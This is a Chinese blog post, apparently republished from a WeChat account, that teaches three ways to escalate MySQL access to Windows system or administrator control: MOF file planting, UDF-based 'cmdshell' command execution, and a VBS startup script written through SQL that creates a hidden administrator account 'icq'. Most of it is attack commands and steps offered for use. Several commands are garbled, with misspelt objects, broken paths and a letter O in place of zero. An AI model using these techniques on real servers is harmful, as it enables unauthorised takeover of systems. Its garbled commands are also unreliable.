mysql数据库提权

原理：

利用了c:/windows/system32/wbem/mof/目录下的nullevt.mof文件，该文件每分钟都会在一个特定的时间去执行一次的特性，通过写入cmd命令使其被带入执行。

利用条件：

Windows<=2003

对c:/windows/system32/wbem/mof/目录有写权限

提权方法：

1、在可写目录中上传mof文件（当前目录、c:/windows/temp/等等）。

2、执行load_file及into  dumpfile把文件导出到正确的位置。

SELECT  load_file("C:/phpstudy/WWW/add_admin.mof")  into  dumpfile  "C:/WINDOWS/system32/wbem/mof/add_admin.mof"

3、select load_file(“c:/phpstudy/www/”)

原理：

1、UDF（User Defined Function）用户自定义函数，支持用户自定义。

2、通过添加新的函数，对MySQL服务器进行功能扩充，从而创建函数，将MySQL账号转化为系统system权限。

3、UDF提权是通过root权限导出udf.dII到系统目录下，可以通过udf.dII调用执行cmd。

利用条件：

1、注意MySQL数据库版本，不同版本操作不一样。

2、MySQL对文件的写入和读取无限制。

步骤：

1、找到udf.dll文件（需要使用高级编程语言封装shellcode/sqlmap/github等等）。

2、将udf.dll文件上传到指定的位置。

如果/lib/plugin目录不存在，可以利用NTFS ADS流来创建文件夹。

3、将udf.dll文件引入到MySQL数据库中。

create  function  cmdshell  returns  string  soname  "udf.dll";注意：函数名cmdshell不是随便写的，需要查看udf.dll中封装的函数名，一般使用winhex等二进制查看器可获取查看是否导入成功 ：use  mysql;  select  *  from  mysql.func

4、如果导入成功，则开始使用，使用所需函数一定要看清楚，如函数名确实是cmdshell。

select  cmdshell("whoami")

原理：

将一段VBS脚本导入到开机启动项中，如果管理员重启了服务器，那么就会自动调用该脚本，并执行其中的用户添加及提权命令。

利用条件∶

1、上传的目录必须具备可读写的权限。

2、调用的 cmd 也必须有足够的权限，将vbs脚本写到启动项对应的文件夹中。

提权方式∶

MySQL启动项提权

1、直接将VBS 提权脚本上传到启动项目录下

2、利用SQL命令来进行VBS脚本的创建及添加

利用SQL命令来进行VBS脚本的创建步骤：

1、连接到对方MySQL服务器，进入后查看数据库中有哪些数据表

命令：show tables默认的情况下，test中没有任何表的存在。

2、进入test数据库，并创建一个新的表：

create table a（cmd text）//创建了一个新的表，名为a，表中只存放了一个字段，字段名为cmd，为text文本

3、在表中插入内容，用这三条命令来建立一个VBS的脚本程序：

insert into a values("set wshshell=createobject("wscrit.shel");inser into a values("a=wshshellrun("cmd.exe /c net user icq 123.com /add"",0)");insert into a values("b=wshshellrun("cmdexe/c net localgroup administrators icq/add",O)");

4、输出表为一个VBS的脚本文件

select  *  from  ainto  dumpfile"C:Documents  and  SettingsAdministrator「开始」菜单程序启动1.vbs";

5、利用其他手段重启电脑

备注：个人理解，如果有误，感谢指出。

• 往期精选

GoldenEye 靶场渗透测试

CVE-2020-1472漏洞复现

记一次艰难的SQL注入(过安全狗)

干货｜sql注入绕WAF的N种姿势

下方点击关注发现更多精彩！

原文始发于微信公众号（银河护卫队super）：mysql数据库提权